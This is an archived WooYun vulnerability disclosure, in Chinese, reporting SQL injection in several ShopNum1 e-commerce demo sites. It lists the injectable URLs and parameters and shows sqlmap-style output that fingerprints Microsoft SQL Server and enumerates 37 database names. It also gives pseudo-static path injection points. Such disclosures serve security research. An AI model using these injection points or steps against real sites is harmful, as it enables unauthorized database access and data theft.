乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-07: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-12-22: 厂商已经主动忽略漏洞,细节向公众公开
..............
..........
这里以多个版本为例官方演示站的http://personal.shopnum1.com/ProductListCategory.html?ProductCategoryID=71&&Price1=3079&&Price2=3319available databases [37]:[*] aspnetdb[*] dailiAgent[*] Demo0510[*] DZ[*] ERPDataDictionary[*] ERPDataDictionaryTest[*] fenxiao[*] fenxiaoportal[*] fenxiaoportal928[*] fenxiaoportalV8.0[*] GroupflyERP[*] GroupFlyHelpCenter[*] groupflyOA[*] master[*] model[*] msdb[*] nrqiang0715[*] Nrqiang2[*] Nrqiang2_TB[*] Nrqiang3[*] nrqiangV8.0[*] sales[*] Shopnum1_Demo[*] Shopnum1_DemoTB[*] ShopNum1_Personal[*] Shopnum1_TG[*] ShopNum1_Union[*] Shopnum1ERPTest[*] ShopNum1Errors[*] ShopNum1Verify[*] tempdb[*] test[*] test1028[*] testshopnum1[*] vanclPortal[*] yike[*] youdu
分销门户系统http://fenxiaoportal.shopnum1.com/ProductListCategory.html?Price1=233&&Price2=294&&ProductCategoryID=92available databases [37]:[*] aspnetdb[*] dailiAgent[*] Demo0510[*] DZ[*] ERPDataDictionary[*] ERPDataDictionaryTest[*] fenxiao[*] fenxiaoportal[*] fenxiaoportal928[*] fenxiaoportalV8.0[*] GroupflyERP[*] GroupFlyHelpCenter[*] groupflyOA[*] master[*] model[*] msdb[*] nrqiang0715[*] Nrqiang2[*] Nrqiang2_TB[*] Nrqiang3[*] nrqiangV8.0[*] sales[*] Shopnum1_Demo[*] Shopnum1_DemoTB[*] ShopNum1_Personal[*] Shopnum1_TG[*] ShopNum1_Union[*] Shopnum1ERPTest[*] ShopNum1Errors[*] ShopNum1Verify[*] tempdb[*] test[*] test1028[*] testshopnum1[*] vanclPortal[*] yike[*] youdu
淘铺通系统http://demotb.shopnum1.com/ProductListCategory.html?ProductCategoryID=62&&Price1=2097&&Price2=2296[22:31:55] [INFO] testing MySQL[22:31:55] [WARNING] the back-end DBMS is not MySQL[22:31:55] [INFO] testing Oracle[22:31:55] [WARNING] the back-end DBMS is not Oracle[22:31:55] [INFO] testing PostgreSQL[22:31:56] [WARNING] the back-end DBMS is not PostgreSQL[22:31:56] [INFO] testing Microsoft SQL Server[22:31:56] [INFO] confirming Microsoft SQL Server[22:31:57] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[22:31:57] [INFO] fetching database names[22:31:57] [INFO] the SQL query used returns 37 entries解表时间比较复杂 搁置
其他版本也存在伪静态注入http://demotb.shopnum1.com/ProductDetail/4d86c756-cc53-47a3-a79f-2fd43e78f995'.htmlhttp://personal.shopnum1.com/ProductListCategory/73'.html
...................
未能联系到厂商或者厂商积极拒绝